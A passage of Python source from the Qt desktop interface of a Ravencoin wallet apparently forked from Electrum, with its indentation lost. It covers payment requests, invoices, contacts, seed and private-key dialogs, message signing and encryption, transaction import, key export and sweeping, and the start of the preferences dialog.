refund_address = self.wallet.get_receiving_address()
coro = pr.send_payment_and_receive_paymentack(str(tx), refund_address)
fut = asyncio.run_coroutine_threadsafe(coro, self.network.asyncio_loop)
ack_status, ack_msg = fut.result(timeout=20)
self.logger.info(f"Payment ACK: {ack_status}. Ack message: {ack_msg}")
return status, msg
# Capture current TL window; override might be removed on return
parent = self.top_level_window(lambda win: isinstance(win, MessageBoxMixin))
def broadcast_done(result):
# GUI thread
if result:
status, msg = result
if status:
if tx_desc is not None and tx.is_complete():
self.wallet.set_label(tx.txid(), tx_desc)
parent.show_message(_('Payment sent.') + '\n' + msg)
self.invoice_list.update()
self.do_clear()
else:
msg = msg or ''
parent.show_error(msg)
WaitingDialog(self, _('Broadcasting transaction...'),
broadcast_thread, broadcast_done, self.on_error)
def query_choice(self, msg, choices):
# Needed by QtHandler for hardware wallets
dialog = WindowModalDialog(self.top_level_window())
clayout = ChoicesLayout(msg, choices)
vbox = QVBoxLayout(dialog)
vbox.addLayout(clayout.layout())
vbox.addLayout(Buttons(OkButton(dialog)))
if not dialog.exec_():
return None
return clayout.selected_index()
def lock_amount(self, b):
self.amount_e.setFrozen(b)
self.max_button.setEnabled(not b)
def prepare_for_payment_request(self):
self.show_send_tab()
self.payto_e.is_pr = True
for e in [self.payto_e, self.message_e]:
e.setFrozen(True)
self.lock_amount(True)
self.payto_e.setText(_("please wait..."))
return True
def delete_invoice(self, key):
self.invoices.remove(key)
self.invoice_list.update()
def payment_request_ok(self):
pr = self.payment_request
if not pr:
return
key = self.invoices.add(pr)
status = self.invoices.get_status(key)
self.invoice_list.update()
if status == PR_PAID:
self.show_message("invoice already paid")
self.do_clear()
self.payment_request = None
return
self.payto_e.is_pr = True
if not pr.has_expired():
self.payto_e.setGreen()
else:
self.payto_e.setExpired()
self.payto_e.setText(pr.get_requestor())
self.amount_e.setText(format_satoshis_plain(pr.get_amount(), self.decimal_point))
self.message_e.setText(pr.get_memo())
# signal to set fee
self.amount_e.textEdited.emit("")
def payment_request_error(self):
pr = self.payment_request
if not pr:
return
self.show_message(pr.error)
self.payment_request = None
self.do_clear()
def on_pr(self, request):
self.payment_request = request
if self.payment_request.verify(self.contacts):
self.payment_request_ok_signal.emit()
else:
self.payment_request_error_signal.emit()
def pay_to_URI(self, URI):
if not URI:
return
try:
out = util.parse_URI(URI, self.on_pr)
except InvalidRavencoinURI as e:
self.show_error(_("Error parsing URI") + f":\n{e}")
return
self.show_send_tab()
r = out.get('r')
sig = out.get('sig')
name = out.get('name')
if r or (name and sig):
self.prepare_for_payment_request()
return
address = out.get('address')
amount = out.get('amount')
label = out.get('label')
message = out.get('message')
# use label as description (not BIP21 compliant)
if label and not message:
message = label
if address:
self.payto_e.setText(address)
if message:
self.message_e.setText(message)
if amount:
self.amount_e.setAmount(amount)
self.amount_e.textEdited.emit("")
def do_clear(self):
self.max_button.setChecked(False)
self.not_enough_funds = False
self.payment_request = None
self.payto_e.is_pr = False
for e in [self.payto_e, self.message_e, self.amount_e, self.fiat_send_e,
self.fee_e, self.feerate_e]:
e.setText('')
e.setFrozen(False)
self.fee_slider.activate()
self.feerate_e.setAmount(self.config.fee_per_byte())
self.size_e.setAmount(0)
self.feerounding_icon.setVisible(False)
self.set_pay_from([])
self.tx_external_keypairs = {}
self.update_status()
run_hook('do_clear', self)
def set_frozen_state_of_addresses(self, addrs, freeze: bool):
self.wallet.set_frozen_state_of_addresses(addrs, freeze)
self.address_list.update()
self.utxo_list.update()
self.update_fee()
def set_frozen_state_of_coins(self, utxos, freeze: bool):
self.wallet.set_frozen_state_of_coins(utxos, freeze)
self.utxo_list.update()
self.update_fee()
def create_list_tab(self, l, toolbar=None):
w = QWidget()
w.searchable_list = l
vbox = QVBoxLayout()
w.setLayout(vbox)
vbox.setContentsMargins(0, 0, 0, 0)
vbox.setSpacing(0)
if toolbar:
vbox.addLayout(toolbar)
vbox.addWidget(l)
return w
def create_assets_tab(self):
from .asset_list import AssetList
self.asset_list = l = AssetList(self)
toolbar = l.create_toolbar(self.config)
return self.create_list_tab(l, toolbar)
def create_addresses_tab(self):
from .address_list import AddressList
self.address_list = l = AddressList(self)
toolbar = l.create_toolbar(self.config)
toolbar_shown = self.config.get('show_toolbar_addresses', False)
l.show_toolbar(toolbar_shown)
return self.create_list_tab(l, toolbar)
def create_utxo_tab(self):
from .utxo_list import UTXOList
self.utxo_list = l = UTXOList(self)
return self.create_list_tab(l)
def create_contacts_tab(self):
from .contact_list import ContactList
self.contact_list = l = ContactList(self)
return self.create_list_tab(l)
def remove_address(self, addr):
if self.question(_("Do you want to remove {} from your wallet?").format(addr)):
self.wallet.delete_address(addr)
self.need_update.set() # history, addresses, coins
self.clear_receive_tab()
def get_coins(self):
if self.pay_from:
return self.pay_from
else:
return self.wallet.get_spendable_coins(None, self.config)
def spend_coins(self, coins):
self.set_pay_from(coins)
self.show_send_tab()
self.update_fee()
def paytomany(self):
self.show_send_tab()
self.payto_e.paytomany()
msg = '\n'.join([
_('Enter a list of outputs in the \'Pay to\' field.'),
_('One output per line.'),
_('Format: address, amount'),
_('You may load a CSV file using the file icon.')
])
self.show_message(msg, title=_('Pay to many'))
def payto_contacts(self, labels):
paytos = [self.get_contact_payto(label) for label in labels]
self.show_send_tab()
if len(paytos) == 1:
self.payto_e.setText(paytos[0])
self.amount_e.setFocus()
else:
text = "\n".join([payto + ", 0" for payto in paytos])
self.payto_e.setText(text)
self.payto_e.setFocus()
def set_contact(self, label, address):
if not is_address(address):
self.show_error(_('Invalid Address'))
self.contact_list.update() # Displays original unchanged value
return False
self.contacts[address] = ('address', label)
self.contact_list.update()
self.history_list.update()
self.update_completions()
return True
def delete_contacts(self, labels):
if not self.question(_("Remove {} from your list of contacts?")
.format(" + ".join(labels))):
return
for label in labels:
self.contacts.pop(label)
self.history_list.update()
self.contact_list.update()
self.update_completions()
def show_invoice(self, key):
pr = self.invoices.get(key)
if pr is None:
self.show_error('Cannot find payment request in wallet.')
return
pr.verify(self.contacts)
self.show_pr_details(pr)
def show_pr_details(self, pr):
key = pr.get_id()
d = WindowModalDialog(self, _("Invoice"))
vbox = QVBoxLayout(d)
grid = QGridLayout()
grid.addWidget(QLabel(_("Requestor") + ':'), 0, 0)
grid.addWidget(QLabel(pr.get_requestor()), 0, 1)
grid.addWidget(QLabel(_("Amount") + ':'), 1, 0)
outputs_str = '\n'.join(map(lambda x: self.format_amount(x[2])+ self.base_unit() + ' @ ' + x[1], pr.get_outputs()))
grid.addWidget(QLabel(outputs_str), 1, 1)
expires = pr.get_expiration_date()
grid.addWidget(QLabel(_("Memo") + ':'), 2, 0)
grid.addWidget(QLabel(pr.get_memo()), 2, 1)
grid.addWidget(QLabel(_("Signature") + ':'), 3, 0)
grid.addWidget(QLabel(pr.get_verify_status()), 3, 1)
if expires:
grid.addWidget(QLabel(_("Expires") + ':'), 4, 0)
grid.addWidget(QLabel(format_time(expires)), 4, 1)
vbox.addLayout(grid)
def do_export():
name = str(key) + '.bip70'
fn = self.getSaveFileName(_("Save invoice to file"), name, filter="*.bip70")
if not fn:
return
with open(fn, 'wb') as f:
data = f.write(pr.raw)
self.show_message(_('Invoice saved as' + ' ' + fn))
exportButton = EnterButton(_('Save'), do_export)
def do_delete():
if self.question(_('Delete invoice?')):
self.invoices.remove(key)
self.history_list.update()
self.invoice_list.update()
d.close()
deleteButton = EnterButton(_('Delete'), do_delete)
vbox.addLayout(Buttons(exportButton, deleteButton, CloseButton(d)))
d.exec_()
def do_pay_invoice(self, key):
pr = self.invoices.get(key)
self.payment_request = pr
self.prepare_for_payment_request()
pr.error = None # this forces verify() to re-run
if pr.verify(self.contacts):
self.payment_request_ok()
else:
self.payment_request_error()
def create_console_tab(self):
from .console import Console
self.console = console = Console()
return console
def update_console(self):
console = self.console
console.history = self.config.get("console-history",[])
console.history_index = len(console.history)
console.updateNamespace({
'wallet': self.wallet,
'network': self.network,
'plugins': self.gui_object.plugins,
'window': self,
'config': self.config,
'electrum': electrum,
'daemon': self.gui_object.daemon,
'util': util,
'ravencoin': ravencoin,
})
c = commands.Commands(self.config, self.wallet, self.network, lambda: self.console.set_json(True))
methods = {}
def mkfunc(f, method):
return lambda *args: f(method, args, self.password_dialog)
for m in dir(c):
if m[0]=='_' or m in ['network','wallet','config']: continue
methods[m] = mkfunc(c._run, m)
console.updateNamespace(methods)
def create_status_bar(self):
sb = QStatusBar()
sb.setFixedHeight(35)
self.balance_label = QLabel("Loading wallet...")
self.balance_label.setTextInteractionFlags(Qt.TextSelectableByMouse)
self.balance_label.setAlignment(Qt.AlignVCenter)
self.balance_label.setStyleSheet("""QLabel { padding: 0 }""")
sb.addWidget(self.balance_label)
self.status_label = QLabel("")
self.status_label.setAlignment(Qt.AlignRight | Qt.AlignVCenter)
self.status_label.setStyleSheet("""QLabel { padding: 0 }""")
sb.addPermanentWidget(self.status_label)
self.search_box = QLineEdit()
self.search_box.textChanged.connect(self.do_search)
self.search_box.hide()
sb.addPermanentWidget(self.search_box)
self.update_check_button = QPushButton("")
self.update_check_button.setFlat(True)
self.update_check_button.setCursor(QCursor(Qt.PointingHandCursor))
self.update_check_button.setIcon(read_QIcon("update.png"))
self.update_check_button.hide()
sb.addPermanentWidget(self.update_check_button)
self.password_button = StatusBarButton(QIcon(), _("Password"), self.change_password_dialog )
sb.addPermanentWidget(self.password_button)
sb.addPermanentWidget(StatusBarButton(read_QIcon("preferences.png"), _("Preferences"), self.settings_dialog ) )
self.seed_button = StatusBarButton(read_QIcon("seed.png"), _("Seed"), self.show_seed_dialog )
sb.addPermanentWidget(self.seed_button)
self.status_button = StatusBarButton(read_QIcon("status_disconnected.png"), _("Network"), lambda: self.gui_object.show_network_dialog(self))
sb.addPermanentWidget(self.status_button)
run_hook('create_status_bar', sb)
self.setStatusBar(sb)
def update_lock_icon(self):
icon = read_QIcon("lock.png") if self.wallet.has_password() else read_QIcon("unlock.png")
self.password_button.setIcon(icon)
def update_buttons_on_seed(self):
self.seed_button.setVisible(self.wallet.has_seed())
self.password_button.setVisible(self.wallet.may_have_password())
self.send_button.setVisible(not self.wallet.is_watching_only())
def change_password_dialog(self):
from electrum.storage import STO_EV_XPUB_PW
if self.wallet.get_available_storage_encryption_version() == STO_EV_XPUB_PW:
from .password_dialog import ChangePasswordDialogForHW
d = ChangePasswordDialogForHW(self, self.wallet)
ok, encrypt_file = d.run()
if not ok:
return
try:
hw_dev_pw = self.wallet.keystore.get_password_for_storage_encryption()
except UserCancelled:
return
except BaseException as e:
self.logger.exception('')
self.show_error(str(e))
return
old_password = hw_dev_pw if self.wallet.has_password() else None
new_password = hw_dev_pw if encrypt_file else None
else:
from .password_dialog import ChangePasswordDialogForSW
d = ChangePasswordDialogForSW(self, self.wallet)
ok, old_password, new_password, encrypt_file = d.run()
if not ok:
return
try:
self.wallet.update_password(old_password, new_password, encrypt_file)
except InvalidPassword as e:
self.show_error(str(e))
return
except BaseException:
self.logger.exception('Failed to update password')
self.show_error(_('Failed to update password'))
return
msg = _('Password was updated successfully') if self.wallet.has_password() else _('Password is disabled, this wallet is not protected')
self.show_message(msg, title=_("Success"))
self.update_lock_icon()
def toggle_search(self):
tab = self.tabs.currentWidget()
#if hasattr(tab, 'searchable_list'):
# tab.searchable_list.toggle_toolbar()
#return
self.search_box.setHidden(not self.search_box.isHidden())
if not self.search_box.isHidden():
self.search_box.setFocus(1)
else:
self.do_search('')
def do_search(self, t):
tab = self.tabs.currentWidget()
if hasattr(tab, 'searchable_list'):
tab.searchable_list.filter(t)
def new_contact_dialog(self):
d = WindowModalDialog(self, _("New Contact"))
vbox = QVBoxLayout(d)
vbox.addWidget(QLabel(_('New Contact') + ':'))
grid = QGridLayout()
line1 = QLineEdit()
line1.setFixedWidth(32 * char_width_in_lineedit())
line2 = QLineEdit()
line2.setFixedWidth(32 * char_width_in_lineedit())
grid.addWidget(QLabel(_("Address")), 1, 0)
grid.addWidget(line1, 1, 1)
grid.addWidget(QLabel(_("Name")), 2, 0)
grid.addWidget(line2, 2, 1)
vbox.addLayout(grid)
vbox.addLayout(Buttons(CancelButton(d), OkButton(d)))
if d.exec_():
self.set_contact(line2.text(), line1.text())
def show_master_public_keys(self):
dialog = WindowModalDialog(self, _("Wallet Information"))
dialog.setMinimumSize(500, 100)
mpk_list = self.wallet.get_master_public_keys()
vbox = QVBoxLayout()
wallet_type = self.wallet.storage.get('wallet_type', '')
if self.wallet.is_watching_only():
wallet_type += ' [{}]'.format(_('watching-only'))
seed_available = _('True') if self.wallet.has_seed() else _('False')
keystore_types = [k.get_type_text() for k in self.wallet.get_keystores()]
grid = QGridLayout()
basename = os.path.basename(self.wallet.storage.path)
grid.addWidget(QLabel(_("Wallet name")+ ':'), 0, 0)
grid.addWidget(QLabel(basename), 0, 1)
grid.addWidget(QLabel(_("Wallet type")+ ':'), 1, 0)
grid.addWidget(QLabel(wallet_type), 1, 1)
grid.addWidget(QLabel(_("Script type")+ ':'), 2, 0)
grid.addWidget(QLabel(self.wallet.txin_type), 2, 1)
grid.addWidget(QLabel(_("Seed available") + ':'), 3, 0)
grid.addWidget(QLabel(str(seed_available)), 3, 1)
if len(keystore_types) <= 1:
grid.addWidget(QLabel(_("Keystore type") + ':'), 4, 0)
ks_type = str(keystore_types[0]) if keystore_types else _('No keystore')
grid.addWidget(QLabel(ks_type), 4, 1)
vbox.addLayout(grid)
if self.wallet.is_deterministic():
mpk_text = ShowQRTextEdit()
mpk_text.setMaximumHeight(150)
mpk_text.addCopyButton(self.app)
def show_mpk(index):
mpk_text.setText(mpk_list[index])
mpk_text.repaint() # macOS hack for #4777
# only show the combobox in case multiple accounts are available
if len(mpk_list) > 1:
def label(key):
if isinstance(self.wallet, Multisig_Wallet):
return _("cosigner") + f' {key+1} ( keystore: {keystore_types[key]} )'
return ''
labels = [label(i) for i in range(len(mpk_list))]
on_click = lambda clayout: show_mpk(clayout.selected_index())
labels_clayout = ChoicesLayout(_("Master Public Keys"), labels, on_click)
vbox.addLayout(labels_clayout.layout())
else:
vbox.addWidget(QLabel(_("Master Public Key")))
show_mpk(0)
vbox.addWidget(mpk_text)
vbox.addStretch(1)
vbox.addLayout(Buttons(CloseButton(dialog)))
dialog.setLayout(vbox)
dialog.exec_()
def remove_wallet(self):
if self.question('\n'.join([
_('Delete wallet file?'),
"%s"%self.wallet.storage.path,
_('If your wallet contains funds, make sure you have saved its seed.')])):
self._delete_wallet()
@protected
def _delete_wallet(self, password):
wallet_path = self.wallet.storage.path
basename = os.path.basename(wallet_path)
r = self.gui_object.daemon.delete_wallet(wallet_path)
self.close()
if r:
self.show_error(_("Wallet removed: {}").format(basename))
else:
self.show_error(_("Wallet file not found: {}").format(basename))
@protected
def show_seed_dialog(self, password):
if not self.wallet.has_seed():
self.show_message(_('This wallet has no seed'))
return
keystore = self.wallet.get_keystore()
try:
seed = keystore.get_seed(password)
passphrase = keystore.get_passphrase(password)
except BaseException as e:
self.show_error(str(e))
return
from .seed_dialog import SeedDialog
d = SeedDialog(self, seed, passphrase)
d.exec_()
def show_qrcode(self, data, title = _("QR code"), parent=None):
if not data:
return
d = QRDialog(data, parent or self, title)
d.exec_()
@protected
def show_private_key(self, address, password):
if not address:
return
try:
pk, redeem_script = self.wallet.export_private_key(address, password)
except Exception as e:
self.logger.exception('')
self.show_message(str(e))
return
xtype = ravencoin.deserialize_privkey(pk)[0]
d = WindowModalDialog(self, _("Private key"))
d.setMinimumSize(600, 150)
vbox = QVBoxLayout()
vbox.addWidget(QLabel(_("Address") + ': ' + address))
vbox.addWidget(QLabel(_("Script type") + ': ' + xtype))
vbox.addWidget(QLabel(_("Private key") + ':'))
keys_e = ShowQRTextEdit(text=pk)
keys_e.addCopyButton(self.app)
vbox.addWidget(keys_e)
if redeem_script:
vbox.addWidget(QLabel(_("Redeem Script") + ':'))
rds_e = ShowQRTextEdit(text=redeem_script)
rds_e.addCopyButton(self.app)
vbox.addWidget(rds_e)
vbox.addLayout(Buttons(CloseButton(d)))
d.setLayout(vbox)
d.exec_()
msg_sign = _("Signing with an address actually means signing with the corresponding "
"private key, and verifying with the corresponding public key. The "
"address you have entered does not have a unique public key, so these "
"operations cannot be performed.") + '\n\n' + \
_('The operation is undefined. Not just in Electrum, but in general.')
@protected
def do_sign(self, address, message, signature, password):
address = address.text().strip()
message = message.toPlainText().strip()
if not ravencoin.is_address(address):
self.show_message(_('Invalid Ravencoin address.'))
return
if self.wallet.is_watching_only():
self.show_message(_('This is a watching-only wallet.'))
return
if not self.wallet.is_mine(address):
self.show_message(_('Address not in wallet.'))
return
txin_type = self.wallet.get_txin_type(address)
if txin_type not in ['p2pkh', 'p2wpkh', 'p2wpkh-p2sh']:
self.show_message(_('Cannot sign messages with this type of address:') + \
' ' + txin_type + '\n\n' + self.msg_sign)
return
task = partial(self.wallet.sign_message, address, message, password)
def show_signed_message(sig):
try:
signature.setText(base64.b64encode(sig).decode('ascii'))
except RuntimeError:
# (signature) wrapped C/C++ object has been deleted
pass
self.wallet.thread.add(task, on_success=show_signed_message)
def do_verify(self, address, message, signature):
address = address.text().strip()
message = message.toPlainText().strip().encode('utf-8')
if not ravencoin.is_address(address):
self.show_message(_('Invalid Ravencoin address.'))
return
try:
# This can throw on invalid base64
sig = base64.b64decode(str(signature.toPlainText()))
verified = ecc.verify_message_with_address(address, sig, message)
except Exception as e:
verified = False
if verified:
self.show_message(_("Signature verified"))
else:
self.show_error(_("Wrong signature"))
def sign_verify_message(self, address=''):
d = WindowModalDialog(self, _('Sign/verify Message'))
d.setMinimumSize(610, 290)
layout = QGridLayout(d)
message_e = QTextEdit()
message_e.setAcceptRichText(False)
layout.addWidget(QLabel(_('Message')), 1, 0)
layout.addWidget(message_e, 1, 1)
layout.setRowStretch(2,3)
address_e = QLineEdit()
address_e.setText(address)
layout.addWidget(QLabel(_('Address')), 2, 0)
layout.addWidget(address_e, 2, 1)
signature_e = QTextEdit()
signature_e.setAcceptRichText(False)
layout.addWidget(QLabel(_('Signature')), 3, 0)
layout.addWidget(signature_e, 3, 1)
layout.setRowStretch(3,1)
hbox = QHBoxLayout()
b = QPushButton(_("Sign"))
b.clicked.connect(lambda: self.do_sign(address_e, message_e, signature_e))
hbox.addWidget(b)
b = QPushButton(_("Verify"))
b.clicked.connect(lambda: self.do_verify(address_e, message_e, signature_e))
hbox.addWidget(b)
b = QPushButton(_("Close"))
b.clicked.connect(d.accept)
hbox.addWidget(b)
layout.addLayout(hbox, 4, 1)
d.exec_()
@protected
def do_decrypt(self, message_e, pubkey_e, encrypted_e, password):
if self.wallet.is_watching_only():
self.show_message(_('This is a watching-only wallet.'))
return
cyphertext = encrypted_e.toPlainText()
task = partial(self.wallet.decrypt_message, pubkey_e.text(), cyphertext, password)
def setText(text):
try:
message_e.setText(text.decode('utf-8'))
except RuntimeError:
# (message_e) wrapped C/C++ object has been deleted
pass
self.wallet.thread.add(task, on_success=setText)
def do_encrypt(self, message_e, pubkey_e, encrypted_e):
message = message_e.toPlainText()
message = message.encode('utf-8')
try:
public_key = ecc.ECPubkey(bfh(pubkey_e.text()))
except BaseException as e:
self.logger.exception('Invalid Public key')
self.show_warning(_('Invalid Public key'))
return
encrypted = public_key.encrypt_message(message)
encrypted_e.setText(encrypted.decode('ascii'))
def encrypt_message(self, address=''):
d = WindowModalDialog(self, _('Encrypt/decrypt Message'))
d.setMinimumSize(610, 490)
layout = QGridLayout(d)
message_e = QTextEdit()
message_e.setAcceptRichText(False)
layout.addWidget(QLabel(_('Message')), 1, 0)
layout.addWidget(message_e, 1, 1)
layout.setRowStretch(2,3)
pubkey_e = QLineEdit()
if address:
pubkey = self.wallet.get_public_key(address)
pubkey_e.setText(pubkey)
layout.addWidget(QLabel(_('Public key')), 2, 0)
layout.addWidget(pubkey_e, 2, 1)
encrypted_e = QTextEdit()
encrypted_e.setAcceptRichText(False)
layout.addWidget(QLabel(_('Encrypted')), 3, 0)
layout.addWidget(encrypted_e, 3, 1)
layout.setRowStretch(3,1)
hbox = QHBoxLayout()
b = QPushButton(_("Encrypt"))
b.clicked.connect(lambda: self.do_encrypt(message_e, pubkey_e, encrypted_e))
hbox.addWidget(b)
b = QPushButton(_("Decrypt"))
b.clicked.connect(lambda: self.do_decrypt(message_e, pubkey_e, encrypted_e))
hbox.addWidget(b)
b = QPushButton(_("Close"))
b.clicked.connect(d.accept)
hbox.addWidget(b)
layout.addLayout(hbox, 4, 1)
d.exec_()
def password_dialog(self, msg=None, parent=None):
from .password_dialog import PasswordDialog
parent = parent or self
d = PasswordDialog(parent, msg)
return d.run()
def tx_from_text(self, txt):
from electrum.transaction import tx_from_str
try:
tx = tx_from_str(txt)
return Transaction(tx)
except BaseException as e:
self.show_critical(_("Electrum was unable to parse your transaction") + ":\n" + str(e))
return
def read_tx_from_qrcode(self):
from electrum import qrscanner
try:
data = qrscanner.scan_barcode(self.config.get_video_device())
except BaseException as e:
self.show_error(str(e))
return
if not data:
return
# if the user scanned a ravencoin URI
if str(data).startswith("raven:"):
self.pay_to_URI(data)
return
# else if the user scanned an offline signed tx
try:
data = bh2u(ravencoin.base_decode(data, length=None, base=43))
except BaseException as e:
self.show_error((_('Could not decode QR code')+':\n{}').format(repr(e)))
return
tx = self.tx_from_text(data)
if not tx:
return
self.show_transaction(tx)
def read_tx_from_file(self):
fileName = self.getOpenFileName(_("Select your transaction file"), "*.txn")
if not fileName:
return
try:
with open(fileName, "r") as f:
file_content = f.read()
except (ValueError, IOError, os.error) as reason:
self.show_critical(_("Electrum was unable to open your transaction file") + "\n" + str(reason), title=_("Unable to read file or no transaction found"))
return
return self.tx_from_text(file_content)
def do_process_from_text(self):
text = text_dialog(self, _('Input raw transaction'), _("Transaction:"), _("Load transaction"))
if not text:
return
tx = self.tx_from_text(text)
if tx:
self.show_transaction(tx)
def do_process_from_file(self):
tx = self.read_tx_from_file()
if tx:
self.show_transaction(tx)
def do_process_from_txid(self):
from electrum import transaction
txid, ok = QInputDialog.getText(self, _('Lookup transaction'), _('Transaction ID') + ':')
if ok and txid:
txid = str(txid).strip()
try:
raw_tx = self.network.run_from_another_thread(
self.network.get_transaction(txid, timeout=10))
except Exception as e:
self.show_message(_("Error getting transaction from network") + ":\n" + str(e))
return
tx = transaction.Transaction(raw_tx)
self.show_transaction(tx)
@protected
def export_privkeys_dialog(self, password):
if self.wallet.is_watching_only():
self.show_message(_("This is a watching-only wallet"))
return
if isinstance(self.wallet, Multisig_Wallet):
self.show_message(_('WARNING: This is a multi-signature wallet.') + '\n' +
_('It cannot be "backed up" by simply exporting these private keys.'))
d = WindowModalDialog(self, _('Private keys'))
d.setMinimumSize(980, 300)
vbox = QVBoxLayout(d)
msg = "%s\n%s\n%s" % (_("WARNING: ALL your private keys are secret."),
_("Exposing a single private key can compromise your entire wallet!"),
_("In particular, DO NOT use 'redeem private key' services proposed by third parties."))
vbox.addWidget(QLabel(msg))
e = QTextEdit()
e.setReadOnly(True)
vbox.addWidget(e)
defaultname = 'electrum-rvn-private-keys.csv'
select_msg = _('Select file to export your private keys to')
hbox, filename_e, csv_button = filename_field(self, self.config, defaultname, select_msg)
vbox.addLayout(hbox)
b = OkButton(d, _('Export'))
b.setEnabled(False)
vbox.addLayout(Buttons(CancelButton(d), b))
private_keys = {}
addresses = self.wallet.get_addresses()
done = False
cancelled = False
def privkeys_thread():
for addr in addresses:
time.sleep(0.1)
if done or cancelled:
break
privkey = self.wallet.export_private_key(addr, password)[0]
private_keys[addr] = privkey
self.computing_privkeys_signal.emit()
if not cancelled:
self.computing_privkeys_signal.disconnect()
self.show_privkeys_signal.emit()
def show_privkeys():
s = "\n".join( map( lambda x: x[0] + "\t"+ x[1], private_keys.items()))
e.setText(s)
b.setEnabled(True)
self.show_privkeys_signal.disconnect()
nonlocal done
done = True
def on_dialog_closed(*args):
nonlocal done
nonlocal cancelled
if not done:
cancelled = True
self.computing_privkeys_signal.disconnect()
self.show_privkeys_signal.disconnect()
self.computing_privkeys_signal.connect(lambda: e.setText("Please wait... %d/%d"%(len(private_keys),len(addresses))))
self.show_privkeys_signal.connect(show_privkeys)
d.finished.connect(on_dialog_closed)
threading.Thread(target=privkeys_thread).start()
if not d.exec_():
done = True
return
filename = filename_e.text()
if not filename:
return
try:
self.do_export_privkeys(filename, private_keys, csv_button.isChecked())
except (IOError, os.error) as reason:
txt = "\n".join([
_("Electrum was unable to produce a private key-export."),
str(reason)
])
self.show_critical(txt, title=_("Unable to create csv"))
except Exception as e:
self.show_message(str(e))
return
self.show_message(_("Private keys exported."))
def do_export_privkeys(self, fileName, pklist, is_csv):
with open(fileName, "w+") as f:
if is_csv:
transaction = csv.writer(f)
transaction.writerow(["address", "private_key"])
for addr, pk in pklist.items():
transaction.writerow(["%34s"%addr,pk])
else:
f.write(json.dumps(pklist, indent = 4))
def do_import_labels(self):
def import_labels(path):
def _validate(data):
return data # TODO
def import_labels_assign(data):
for key, value in data.items():
self.wallet.set_label(key, value)
import_meta(path, _validate, import_labels_assign)
def on_import():
self.need_update.set()
import_meta_gui(self, _('labels'), import_labels, on_import)
def do_export_labels(self):
def export_labels(filename):
export_meta(self.wallet.labels, filename)
export_meta_gui(self, _('labels'), export_labels)
def sweep_key_dialog(self):
d = WindowModalDialog(self, title=_('Sweep private keys'))
d.setMinimumSize(600, 300)
vbox = QVBoxLayout(d)
hbox_top = QHBoxLayout()
hbox_top.addWidget(QLabel(_("Enter private keys:")))
hbox_top.addWidget(InfoButton(WIF_HELP_TEXT), alignment=Qt.AlignRight)
vbox.addLayout(hbox_top)
keys_e = ScanQRTextEdit(allow_multi=True)
keys_e.setTabChangesFocus(True)
vbox.addWidget(keys_e)
addresses = self.wallet.get_unused_addresses()
if not addresses:
try:
addresses = self.wallet.get_receiving_addresses()
except AttributeError:
addresses = self.wallet.get_addresses()
h, address_e = address_field(addresses)
vbox.addLayout(h)
vbox.addStretch(1)
button = OkButton(d, _('Sweep'))
vbox.addLayout(Buttons(CancelButton(d), button))
button.setEnabled(False)
def get_address():
addr = str(address_e.text()).strip()
if ravencoin.is_address(addr):
return addr
def get_pk(*, raise_on_error=False):
text = str(keys_e.toPlainText())
return keystore.get_private_keys(text, raise_on_error=raise_on_error)
def on_edit():
valid_privkeys = False
try:
valid_privkeys = get_pk(raise_on_error=True) is not None
except Exception as e:
button.setToolTip(f'{_("Error")}: {str(e)}')
else:
button.setToolTip('')
button.setEnabled(get_address() is not None and valid_privkeys)
on_address = lambda text: address_e.setStyleSheet((ColorScheme.DEFAULT if get_address() else ColorScheme.RED).as_stylesheet())
keys_e.textChanged.connect(on_edit)
address_e.textChanged.connect(on_edit)
address_e.textChanged.connect(on_address)
on_address(str(address_e.text()))
if not d.exec_():
return
# user pressed "sweep"
addr = get_address()
try:
self.wallet.check_address(addr)
except InternalAddressCorruption as e:
self.show_error(str(e))
raise
try:
coins, keypairs = sweep_preparations(get_pk(), self.network)
except Exception as e: # FIXME too broad...
self.show_message(str(e))
return
self.do_clear()
self.tx_external_keypairs = keypairs
self.spend_coins(coins)
self.payto_e.setText(addr)
self.spend_max()
self.payto_e.setFrozen(True)
self.amount_e.setFrozen(True)
self.warn_if_watching_only()
def _do_import(self, title, header_layout, func):
text = text_dialog(self, title, header_layout, _('Import'), allow_multi=True)
if not text:
return
keys = str(text).split()
good_inputs, bad_inputs = func(keys)
if good_inputs:
msg = '\n'.join(good_inputs[:10])
if len(good_inputs) > 10: msg += '\n...'
self.show_message(_("The following addresses were added")
+ f' ({len(good_inputs)}):\n' + msg)
if bad_inputs:
msg = "\n".join(f"{key[:10]}... ({msg})" for key, msg in bad_inputs[:10])
if len(bad_inputs) > 10: msg += '\n...'
self.show_error(_("The following inputs could not be imported")
+ f' ({len(bad_inputs)}):\n' + msg)
self.address_list.update()
self.asset_list.update()
self.history_list.update()
def import_addresses(self):
if not self.wallet.can_import_address():
return
title, msg = _('Import addresses'), _("Enter addresses")+':'
self._do_import(title, msg, self.wallet.import_addresses)
@protected
def do_import_privkey(self, password):
if not self.wallet.can_import_privkey():
return
title = _('Import private keys')
header_layout = QHBoxLayout()
header_layout.addWidget(QLabel(_("Enter private keys")+':'))
header_layout.addWidget(InfoButton(WIF_HELP_TEXT), alignment=Qt.AlignRight)
self._do_import(title, header_layout, lambda x: self.wallet.import_private_keys(x, password))
def update_fiat(self):
b = self.fx and self.fx.is_enabled()
self.fiat_send_e.setVisible(b)
self.fiat_receive_e.setVisible(b)
self.history_list.update()
self.address_list.refresh_headers()
self.address_list.update()
self.update_status()
def settings_dialog(self):
self.need_restart = False
d = WindowModalDialog(self, _('Preferences'))
vbox = QVBoxLayout()
tabs = QTabWidget()
gui_widgets = []
fee_widgets = []
tx_widgets = []
id_widgets = []
asset_widgets = []
# language
lang_help = _('Select which language is used in the GUI (after restart).')
lang_label = HelpLabel(_('Language') + ':', lang_help)
lang_combo = QComboBox()
from electrum.i18n import languages
lang_combo.addItems(list(languages.values()))
lang_keys = list(languages.keys())
lang_cur_setting = self.config.get("language", '')
try:
index = lang_keys.index(lang_cur_setting)
except ValueError: # not in list
index = 0
lang_combo.setCurrentIndex(index)
if not self.config.is_modifiable('language'):
for w in [lang_combo, lang_label]: w.setEnabled(False)
def on_lang(x):
lang_request = list(languages.keys())[lang_combo.currentIndex()]
if lang_request != self.config.get('language'):
self.config.set_key("language", lang_request, True)
self.need_restart = True
lang_combo.currentIndexChanged.connect(on_lang)
gui_widgets.append((lang_label, lang_combo))
nz_help = _('Number of zeros displayed after the decimal point. For example, if this is set to 2, "1." will be displayed as "1.00"')
nz_label = HelpLabel(_('Zeros after decimal point') + ':', nz_help)
nz = QSpinBox()
nz.setMinimum(0)
nz.setMaximum(self.decimal_point)
nz.setValue(self.num_zeros)
